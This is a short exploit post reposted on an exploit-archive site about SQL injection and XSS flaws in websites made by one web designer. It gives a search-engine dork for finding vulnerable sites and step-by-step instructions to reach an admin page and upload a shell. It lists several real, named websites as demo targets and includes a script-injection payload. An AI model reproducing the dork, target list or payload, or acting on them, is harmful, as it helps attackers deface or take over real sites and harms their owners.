Yasha Zamanpour SQL Injection Vulnerability And XSS

2019.06.07
ir Mr Hashtag (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

####################### # Exploit Title: Yasha Zamanpour SQL Injection Vulnerability And XSS # Exploit Author: MR (#) # Vendor Homepage: www.zamanpour.com # Google Dork: "Designed & Developed By Yasha Zamanpour" or "طراحي و اجرا: ياشا زمانپور" # Tested On: Windows # Exploit Risk: Medium ####################### # SQL Injection # 1_search google dork: "Designed & Developed By Yasha Zamanpour" or "طراحي و اجرا: ياشا زمانپور" # 2_find target # 3_admin page: /admin/main.php # 4_upload shell # # demo: # http://iap.ir/new/index.php?m_id=723 # http://www.isnutrition.ir/index.php?m_id=762 # http://www.pladaplast.com/enindex.php?m_id=820 ####################### # XSS # # code: "/><script>alert('Xss By MR (#)')</script> # # demo: # http://www.visualartsjournal.ir # http://www.isnutrition.ir/ # http://www.pladaplast.com/ ####################### # me: # mr_h4shtag ####################### # thank to: # mr_b3hz4d #######################


Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top